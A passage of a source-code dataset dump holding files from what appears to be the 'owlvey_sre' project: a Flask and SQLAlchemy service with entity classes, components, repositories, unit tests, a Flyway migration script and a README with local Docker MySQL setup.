"blob_id": "42c7aa8ffefdcad48dfbe5f1bb9c3d0b6facd823",
"content_id": "bc1b8ab35f7404252398acd510e8ea53e663ff83",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 644,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 22,
"path": "/app/core/UserEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, ForeignKey, Integer, String\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass UserEntity(BaseEntity, QueryEntity):\n\n __tablename__ = \"Users\"\n\n email = Column(String(256), nullable=False, unique=True)\n avatar = Column(String(1024), nullable=False)\n\n def __init__(self):\n super().__init__()\n\n def create(self, email, avatar=None):\n self.email = email\n self.avatar = avatar or \"https://cdn.iconscout.com/icon/free/png-256/avatar-375-456327.png\"\n self._validate()\n\n def _read_fields(self):\n return UserEntity.id.name\n\n"
},
{
"alpha_fraction": 0.6608391404151917,
"alphanum_fraction": 0.6608391404151917,
"avg_line_length": 20.923076629638672,
"blob_id": "b87b15b8eead1d121b902695189ceb9ebc76667f",
"content_id": "614538053c464c40df27ff54a18fb69674126c04",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 286,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 13,
"path": "/app/core/EntityUtils.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from typing import List\n\nfrom app.core.BaseEntity import BaseEntity\n\n\nclass EntityUtils:\n\n @staticmethod\n def entities_to_list_dictionaries(data: List[BaseEntity]):\n result = list()\n for item in data:\n result.append(item.to_dict())\n return result\n\n"
},
{
"alpha_fraction": 0.7426636815071106,
"alphanum_fraction": 0.7697516679763794,
"avg_line_length": 53.875,
"blob_id": "5d7812a6937eccfea2d83e794a61bc4444fb4a42",
"content_id": "fd4caeb1ed6768e3779a9f33dbf3f4542bf90fd3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 443,
"license_type": "permissive",
"max_line_length": 139,
"num_lines": 8,
"path": "/flyway_shell.bash",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n\ndatabase/flyway/flyway clean -url=jdbc:mysql://localhost:3306/sredb -user=root -password=p@ssw0rd -locations=filesystem:./database/sql/\n\ndatabase/flyway/flyway migrate -url=jdbc:mysql://localhost:3306/sredb -user=root -password=p@ssw0rd -locations=filesystem:./database/sql/\n\ndatabase/flyway/flyway info -url=jdbc:mysql://localhost:3306/sredb -user=root -password=p@ssw0rd -locations=filesystem:./database/sql/\n\n\n\n\n"
},
{
"alpha_fraction": 0.7048267126083374,
"alphanum_fraction": 0.7048267126083374,
"avg_line_length": 39.349998474121094,
"blob_id": "eec67494db1187e498cbc1be2c030325a50b0bd8",
"content_id": "cd7554101deadd441428fa8989324029b696c94a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1616,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 40,
"path": "/testing/component_test/ComponentDataSeed.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.CustomersComponent import CustomersComponent\nfrom app.components.FeaturesComponent import FeaturesComponent\nfrom app.components.ProductsComponent import ProductsComponent\nfrom app.components.ServicesComponent import ServicesComponent\nfrom testing.DataSeed import DataSeed\n\n\nclass ComponentDataSeed:\n\n def __init__(self):\n pass\n\n @staticmethod\n def build_customer(customer_component: CustomersComponent):\n name = DataSeed.generate_name(\"customer_{}\")\n customer_component.create({\"name\": name})\n customer = customer_component.get_by_name(name)\n return customer\n\n @staticmethod\n def build_product(customer_component: CustomersComponent,\n product_component: ProductsComponent):\n\n name = DataSeed.generate_name(\"product_{}\")\n customer = ComponentDataSeed.build_customer(customer_component)\n product_component.create({\"name\": name, \"customer_id\": customer[\"id\"]})\n product = product_component.get_by_name(name)\n return product\n\n @staticmethod\n def build_service(product, service_component: ServicesComponent):\n name = DataSeed.generate_name(\"service_{}\")\n service_component.create({\"name\": name, \"product_id\": product[\"id\"]})\n return service_component.get_by_name_relation_id(product[\"id\"], name)\n\n @staticmethod\n def build_feature(product, feature_component: FeaturesComponent):\n name = DataSeed.generate_name(\"feature_{}\")\n feature_component.create({\"name\": name, \"product_id\": product[\"id\"]})\n return feature_component.get_by_name(name)\n\n\n"
},
{
"alpha_fraction": 0.7842323780059814,
"alphanum_fraction": 0.7842323780059814,
"avg_line_length": 26.485713958740234,
"blob_id": "705fc2c3991c2bb13ee459eccb750e99e706c037",
"content_id": "573675ea85014cc7f944fd3ee89789e455a9a8a3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 964,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 35,
"path": "/app/startup.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import os\nfrom app.controllers.CustomersController import api as customers_api\nfrom app.controllers.UsersController import api as users_api\nfrom app.controllers.ProductsController import api as products_api\nfrom app.controllers.SquadsController import api as squads_api\nfrom app.controllers.ServicesController import api as services_api\nfrom app.controllers.FeaturesController import api as features_api\n\nfrom flask import Flask\n\nos.environ[\"environment\"] = \"dev\"\n\nfrom app.repositories.database import db_session\n\napp = Flask(__name__)\napp.register_blueprint(users_api)\napp.register_blueprint(customers_api)\napp.register_blueprint(products_api)\napp.register_blueprint(squads_api)\napp.register_blueprint(services_api)\napp.register_blueprint(features_api)\n\n\[email protected]('/')\ndef hello_world():\n return 'Hello, World!'\n\n\[email protected]_appcontext\ndef shut_down_session(exception=None):\n db_session.remove()\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n"
},
{
"alpha_fraction": 0.6808510422706604,
"alphanum_fraction": 0.6808510422706604,
"avg_line_length": 14,
"blob_id": "e2715d91f8f287e350c8f58ebe4d7c99193316d9",
"content_id": "d017ec214b9be69c70c6f83b700634dc15d018d6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 47,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 3,
"path": "/diagrams.bash",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# brew install graphviz\n\n\n"
},
{
"alpha_fraction": 0.6777408719062805,
"alphanum_fraction": 0.6777408719062805,
"avg_line_length": 22.076923370361328,
"blob_id": "fc06b165b8313b08f394b43c586fe21b6156182f",
"content_id": "ef7fedfa85c0a9dd22f5659b4848dde4ab489ac6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 301,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 13,
"path": "/testing/unittest/test_product_entity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom app.core.ProductEntity import ProductEntity\n\n\nclass TestCustomerEntity(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_maintenance(self):\n entity = ProductEntity()\n entity.create(name=\"[email protected]\")\n self.assertEqual(entity.name, \"[email protected]\")\n\n"
},
{
"alpha_fraction": 0.6720321774482727,
"alphanum_fraction": 0.6740442514419556,
"avg_line_length": 24.487178802490234,
"blob_id": "094462dad3faac4787ac7c1a955277ded9568cc6",
"content_id": "edfdb78335386098d70e8e39cd278eb7df544729",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 994,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 39,
"path": "/testing/integration_test/test_users_repository.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom app.components.ConfigurationComponent import ConfigurationComponent\nfrom app.core.UserEntity import UserEntity\nfrom app.core.UsersFrame import UsersFrame\nfrom app.repositories.UsersRepository import UsersRepository\nfrom app.repositories.database import db_session\n\n\nclass TestUsersRepository(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def tearDown(self):\n db_session.remove()\n\n def test_get_all(self):\n configuration = ConfigurationComponent()\n repository = UsersRepository(configuration)\n user = UserEntity(\"cambio\")\n repository.create(user)\n\n data = UserEntity.query.all()\n\n frame = repository.list()\n data = frame.to_dict()\n self.assertTrue(data)\n frame = repository.get_one(data[0][\"user_id\"])\n data = frame.to_dict()\n repository.delete_one(data[0][\"user_id\"])\n self.assertTrue(data)\n\n\ndef main():\n unittest.main()\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5849056839942932,
"alphanum_fraction": 0.5956873297691345,
"avg_line_length": 28.078947067260742,
"blob_id": "b74711e59b7b924a4b5cbc14b190ce9216d073bc",
"content_id": "3dc5269e61d38e1032c940454af271de94194e24",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1113,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 38,
"path": "/testing/unittest/test_user_entity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom app.core.UserEntity import UserEntity\n\n\nclass TestUserEntity(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_maintenance(self):\n user = UserEntity()\n user.from_dict({\"id\": 123, \"email\": \"[email protected]\"}, force=True)\n self.assertEqual(user.email, \"[email protected]\")\n self.assertEqual(user.id, 123)\n\n def test_validate_avatar(self):\n user = UserEntity()\n user.create(\"email@test\")\n\n def test_validate_email_none(self):\n user = UserEntity()\n self.assertRaises(ValueError, lambda: user.create(None, avatar=\"\"))\n\n def test_to_dict(self):\n user = UserEntity()\n user.from_dict({\"id\": 123, \"email\": \"[email protected]\"}, force=True)\n result = user.to_dict()\n self.assertTrue(result)\n self.assertTrue(\"email\" in result)\n\n def test_to_hidden(self):\n user = UserEntity()\n user.from_dict({\"id\": 123, \"email\": \"[email protected]\"}, force=True)\n user._hidden_fields = [\"email\"]\n result = user.to_dict()\n self.assertTrue(result)\n self.assertFalse(\"email\" in result)\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6779935359954834,
"alphanum_fraction": 0.6779935359954834,
"avg_line_length": 27.045454025268555,
"blob_id": "12cd7be70b5989f039023d9163344e3b19eb9457",
"content_id": "4df9820889e3c995ec4f818ae8c6cb419fc94cfc",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 618,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 22,
"path": "/app/core/SubscriptionEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, ForeignKey, Integer, String\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass SubscriptionEntity(BaseEntity, QueryEntity):\n\n __tablename__ = \"Subscriptions\"\n\n customer_id = Column(Integer, ForeignKey('Customers.id'))\n user_id = Column(Integer, ForeignKey('Users.id'))\n\n def __init__(self):\n super().__init__()\n\n def create(self, customer_id, user_id):\n self.customer_id = customer_id\n self.user_id = user_id\n self._validate()\n\n def _read_fields(self):\n return SubscriptionEntity.id.name\n\n"
},
{
"alpha_fraction": 0.6914414167404175,
"alphanum_fraction": 0.6914414167404175,
"avg_line_length": 26.75,
"blob_id": "eacf9507be9b40c1a0b669dd931f0e694073fe0b",
"content_id": "8f5204eb79dfbd5b5bfc2e1362ec604841c4967d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 16,
"path": "/app/components/UsersComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.UserEntity import UserEntity\n\n\nclass UsersComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return UserEntity()\n\n def get_by_email(self, email):\n user = UserEntity.query.filter(UserEntity.email == email).first()\n return user.to_dict()\n"
},
{
"alpha_fraction": 0.6537216901779175,
"alphanum_fraction": 0.6844660043716431,
"avg_line_length": 28.380952835083008,
"blob_id": "de19595578598936f9eb72bc9d706cf228d0a648",
"content_id": "3d07bcefa2fbae4db479b305c845cbcce0f32705",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 618,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 21,
"path": "/app/core/SquadEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, ForeignKey, Integer, String\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass SquadEntity(BaseEntity, QueryEntity):\n\n __tablename__ = \"Squads\"\n\n name = Column(String(256), nullable=False, unique=True)\n avatar = Column(String(1024), nullable=False)\n\n def __init__(self):\n super().__init__()\n\n def create(self, name, avatar=None):\n self.name = name\n self.avatar = avatar or \"https://cdn.iconscout.com/icon/free/png-256/avatar-375-456327.png\"\n\n def _read_fields(self):\n return SquadEntity.id.name\n\n"
},
{
"alpha_fraction": 0.6904024481773376,
"alphanum_fraction": 0.7306501269340515,
"avg_line_length": 17.823530197143555,
"blob_id": "892035eb98b001cfec182f71eed0e8a0afd340be",
"content_id": "0c6266ddacb14c3e138e38f39b767ff0f0febd3d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 323,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 17,
"path": "/README.md",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "# owlvey_sre\nowlvey_sre\n\n\n\n## dependencies \n\n### mysql docker\ndocker pull mysql:8.0\ndocker network create --driver bridge sre-net\ndocker run --name sre-mysql -p 3306:3306 --network sre-net -e MYSQL_ROOT_PASSWORD=p@ssw0rd -d mysql:8.0\ndocker start instanceid\n\ndocker ps \n\n### api flask\npip3 install -r requirements.txt \n\n\n"
},
{
"alpha_fraction": 0.604651153087616,
"alphanum_fraction": 0.604651153087616,
"avg_line_length": 22.724138259887695,
"blob_id": "039f940b9adc46a9207b4a60e6b82000519be264",
"content_id": "7450676ee0f84047bcff91a56889b401a1da9762",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 688,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 29,
"path": "/app/core/UsersFrame.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import pandas as pd\n\nfrom app.core.BaseFrame import BaseFrame\n\n\nclass UsersFrame(BaseFrame):\n\n def __init__(self):\n super().__init__()\n self._frame = pd.DataFrame(columns=self.get_metadata())\n\n def get_metadata(self):\n return [\"user_id\", \"email\"]\n\n def get_schema(self):\n return \"Users\"\n\n def add(self, name):\n self._frame = self._frame.append(data, ignore_index=True)\n\n def load_data(self, data):\n self._frame = pd.DataFrame(data, columns=self.get_metadata())\n\n def to_dict(self, orient=\"records\"):\n return self._frame.to_dict(orient=orient)\n\n def __str__(self):\n print(self._frame.head())\n return \"ok\"\n"
},
{
"alpha_fraction": 0.7275640964508057,
"alphanum_fraction": 0.7275640964508057,
"avg_line_length": 25,
"blob_id": "a4148ff529cdcbf8a0bf76268dac0f838d6ea068",
"content_id": "db89600eaf544647ebaccf036377cc1fa0ddfbf6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 312,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 12,
"path": "/app/components/SourcesComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.SourceEntity import SourceEntity\n\n\nclass SourcesComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return SourceEntity()\n"
},
{
"alpha_fraction": 0.6926605701446533,
"alphanum_fraction": 0.6926605701446533,
"avg_line_length": 27.866666793823242,
"blob_id": "82a1236aee99cfa3cb0f65fea204e9cd891b2983",
"content_id": "1af8268fb67b5a39cf88e31d6301fac51d6a555b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 436,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 15,
"path": "/app/components/CustomersComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.CustomerEntity import CustomerEntity\n\n\nclass CustomersComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> CustomerEntity:\n return CustomerEntity()\n\n def get_by_name(self, name):\n customer = CustomerEntity.query.filter(CustomerEntity.name == name).first()\n return customer.to_dict()\n\n\n\n"
},
{
"alpha_fraction": 0.6216739416122437,
"alphanum_fraction": 0.6221576929092407,
"avg_line_length": 33.949153900146484,
"blob_id": "3fed491ee6fb8c1a15acf0c1b8b40011e1234bbd",
"content_id": "e81ae62c8c3f0c097369c5b1af60f03d90b33046",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2067,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 59,
"path": "/app/components/BaseComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.core.BaseEntity import BaseEntity\nfrom app.core.EntityUtils import EntityUtils\nfrom app.repositories.EntityRepository import EntityRepository\nfrom abc import abstractmethod\n\n\nclass BaseComponent:\n\n def __init__(self):\n self._repository = EntityRepository()\n\n @abstractmethod\n def _build_entity(self) -> BaseEntity:\n pass\n\n def create(self, data):\n entity = self._build_entity()\n entity.create(**data)\n self._repository.create(entity)\n\n def list(self):\n entity = self._build_entity()\n entity_type = type(entity)\n items = entity_type.query.all()\n return EntityUtils.entities_to_list_dictionaries(items)\n\n def get(self, key):\n entity = self._build_entity()\n entity_type = type(entity)\n item = entity_type.query.filter(entity_type.id == key).first()\n return item.to_dict() if item else None\n\n def delete(self, key):\n entity = self._build_entity()\n entity_type = type(entity)\n item = entity_type.query.filter(entity_type.id == key).first()\n self._repository.delete(item)\n\n def update(self, data):\n entity = self._build_entity()\n entity_type = type(entity)\n item = entity_type.query.filter(entity_type.id == data[entity_type.id.name]).first()\n item.from_dict(data)\n self._repository.update(item)\n return item.to_dict()\n\n def get_by_name(self, name):\n entity = self._build_entity()\n entity_type = type(entity)\n entity = entity_type.query.filter(entity_type.name == name).first()\n return entity.to_dict()\n\n def get_by_name_relation_id(self, relation_id, name):\n entity = self._build_entity()\n entity_type = type(entity)\n relationship = next((x for x in entity.__table__.columns if len(x.foreign_keys) > 0), None)\n entity = entity_type.query.filter(getattr(entity_type, relationship.name) == relation_id and\n entity_type.name == name).first()\n return entity.to_dict()\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6948775053024292,
"alphanum_fraction": 0.6948775053024292,
"avg_line_length": 27.0625,
"blob_id": "9dfdc12db7dbb82cff5c2c2712df0af06a275a3c",
"content_id": "9136c092649cef218a2aa91478872eb9e594275b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 449,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 16,
"path": "/app/components/SquadsComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.SquadEntity import SquadEntity\n\n\nclass SquadsComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return SquadEntity()\n\n def get_by_namea(self, name):\n squad = SquadEntity.query.filter(SquadEntity.name == name).first()\n return squad.to_dict()\n"
},
{
"alpha_fraction": 0.7099999785423279,
"alphanum_fraction": 0.7099999785423279,
"avg_line_length": 37.71428680419922,
"blob_id": "e24a037e1769d8652ac9e6bac0382533c245a74d",
"content_id": "16fc548d6091b9c582c787b2068576a4e4b080a3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1100,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 28,
"path": "/testing/component_test/test_customers_component.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom app.components.CustomersComponent import CustomersComponent\nfrom app.components.SubscriptionsComponent import SubscriptionsComponent\nfrom app.components.UsersComponent import UsersComponent\nfrom testing.DataSeed import DataSeed\n\n\nclass TestCustomersComponent(unittest.TestCase):\n\n def setUp(self):\n self.customer_component = CustomersComponent()\n self.user_component = UsersComponent()\n self.subscription_component = SubscriptionsComponent()\n\n def test_maintenance(self):\n email = DataSeed.generate_name(\"account{}@email.com\")\n name = DataSeed.generate_name(\"name {}\")\n self.customer_component.create({\"name\": name})\n self.user_component.create({\"email\": email})\n customer = self.customer_component.get_by_name(name)\n user = self.user_component.get_by_email(email)\n\n self.subscription_component.create({\"customer_id\": customer[\"id\"], \"user_id\": user[\"id\"]})\n\n subscription = self.subscription_component.get_by_customer_user(customer[\"id\"], user[\"id\"])\n\n self.assertTrue(subscription)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6957446932792664,
"alphanum_fraction": 0.7021276354789734,
"avg_line_length": 26.58823585510254,
"blob_id": "7d98cb7bce97c4050ef2f9109520d1e8c6578c9a",
"content_id": "2e657e63b6d4b12a6a924424be474b09d7269909",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 470,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 17,
"path": "/app/core/ProductEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, ForeignKey, Integer, String\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass ProductEntity(BaseEntity, QueryEntity):\n\n __tablename__ = \"Products\"\n\n name = Column(String(256), nullable=False, unique=False)\n customer_id = Column(Integer, ForeignKey('Customers.id'))\n\n def __init__(self):\n super().__init__()\n\n def _read_fields(self):\n return ProductEntity.id.name\n\n"
},
{
"alpha_fraction": 0.5195390582084656,
"alphanum_fraction": 0.5205410718917847,
"avg_line_length": 28.776119232177734,
"blob_id": "00d3b069c0b2ac2c625f3d54e8d60fd2e9487bc7",
"content_id": "4150ac4926338fe0bae851eb3854a37415ff43d4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1996,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 67,
"path": "/app/repositories/BaseRepository.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.ConfigurationComponent import ConfigurationComponent\nimport mysql.connector\n\nfrom app.core.BaseFrame import BaseFrame\n\n\nclass BaseRepository:\n def __init__(self, configuration: ConfigurationComponent):\n self._configuration = configuration\n\n def _build_connection(self):\n db = mysql.connector.connect(\n host=self._configuration.db_host,\n user=self._configuration.db_username,\n passwd=self._configuration.db_password,\n database=self._configuration.db_name,\n auth_plugin='mysql_native_password'\n )\n return db\n\n def _list(self, frame: BaseFrame):\n try:\n db = self._build_connection()\n cursor = db.cursor()\n cursor.execute(\"SELECT {} FROM {}\".format(\",\".join(frame.get_metadata()), frame.get_schema()))\n frame.load_data(list(cursor))\n finally:\n if db:\n db.close()\n if cursor:\n cursor.close()\n\n return frame\n\n def _get_one(self, frame, key):\n try:\n db = self._build_connection()\n cursor = db.cursor()\n cursor.execute(\"SELECT {} FROM {} where {}=%s\".format(\n \",\".join(frame.get_metadata()),\n frame.get_schema(), frame.get_metadata()[0]),\n [key]\n )\n frame.load_data(list(cursor))\n finally:\n if db:\n db.close()\n if cursor:\n cursor.close()\n\n return frame\n\n def _delete_one(self, frame, key):\n try:\n db = self._build_connection()\n cursor = db.cursor()\n cursor.execute(\"delete FROM {} where {}=%s\".format(\n frame.get_schema(), frame.get_metadata()[0]), [key]\n )\n frame.load_data(list(cursor))\n finally:\n if db:\n db.close()\n if cursor:\n cursor.close()\n\n return frame\n\n"
},
{
"alpha_fraction": 0.6959459185600281,
"alphanum_fraction": 0.6959459185600281,
"avg_line_length": 26.25,
"blob_id": "f820bf1b03ec550c17b4d6db8c1a4602289f9bdc",
"content_id": "3bbef318ca99998bab519117f32e2b0fde9f91f5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 16,
"path": "/testing/component_test/test_squad_component.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom app.components.SquadsComponent import SquadsComponent\nfrom testing.DataSeed import DataSeed\n\n\nclass TestSquadComponent(unittest.TestCase):\n\n def setUp(self):\n self.component = SquadsComponent()\n\n def test_maintenance(self):\n name = DataSeed.generate_name(\"squad{}\")\n self.component.create({\"name\": name})\n entity = self.component.get_by_name(name)\n self.assertTrue(entity)\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6647727489471436,
"alphanum_fraction": 0.6647727489471436,
"avg_line_length": 26.959999084472656,
"blob_id": "3dd060da6a78694b4bbb57769497ba765de48c28",
"content_id": "e08009049e191dfbd6d4b6f47263802af576bf5a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 704,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 25,
"path": "/app/repositories/UsersRepository.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.core.UserEntity import UserEntity\nfrom app.core.UsersFrame import UsersFrame\nfrom app.repositories.BaseRepository import BaseRepository\nfrom app.repositories.database import db_session\n\n\nclass UsersRepository(BaseRepository):\n def __init__(self, configuration):\n super().__init__(configuration)\n\n def list(self):\n frame = UsersFrame()\n return self._list(frame)\n\n def create(self, user: UserEntity):\n db_session.add(user)\n db_session.commit()\n\n def get_one(self, key):\n frame = UsersFrame()\n return self._get_one(frame, key)\n\n def delete_one(self, key):\n frame = UsersFrame()\n return self._delete_one(frame, key)\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6845238208770752,
"alphanum_fraction": 0.6904761791229248,
"avg_line_length": 26.94444465637207,
"blob_id": "84637b1d4d259d91e0a6de8108c69fb9a3976ac7",
"content_id": "1149c34fe68e955b258dbd859b6f1186bf6aad85",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 504,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 18,
"path": "/app/core/FeatureEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, ForeignKey, Integer, String\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass FeatureEntity(BaseEntity, QueryEntity):\n\n __tablename__ = \"Features\"\n\n name = Column(String(256), nullable=False, unique=False)\n product_id = Column(Integer, ForeignKey('Products.id'))\n\n def __init__(self, name=None):\n super().__init__()\n self.name = name\n\n def _read_fields(self):\n return FeatureEntity.id.name\n\n"
},
{
"alpha_fraction": 0.6499999761581421,
"alphanum_fraction": 0.6583333611488342,
"avg_line_length": 13.875,
"blob_id": "3bebf1dfa356d1e769f7463e8d8d1fe53ca541cc",
"content_id": "257cb295f494fd3521ea00627013588e2d1b3951",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 120,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 8,
"path": "/testing/DataSeed.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import uuid\n\n\nclass DataSeed:\n\n @staticmethod\n def generate_name(seed):\n return seed.format(uuid.uuid4())\n\n"
},
{
"alpha_fraction": 0.635064959526062,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 20.94285774230957,
"blob_id": "3227b3e4494c5eb69dbe13172cc98f7e580ac555",
"content_id": "114e7e282c598ec5fc1cd8f9c55c3d0b7912384d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 770,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 35,
"path": "/testing/component_test/test_users_component.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
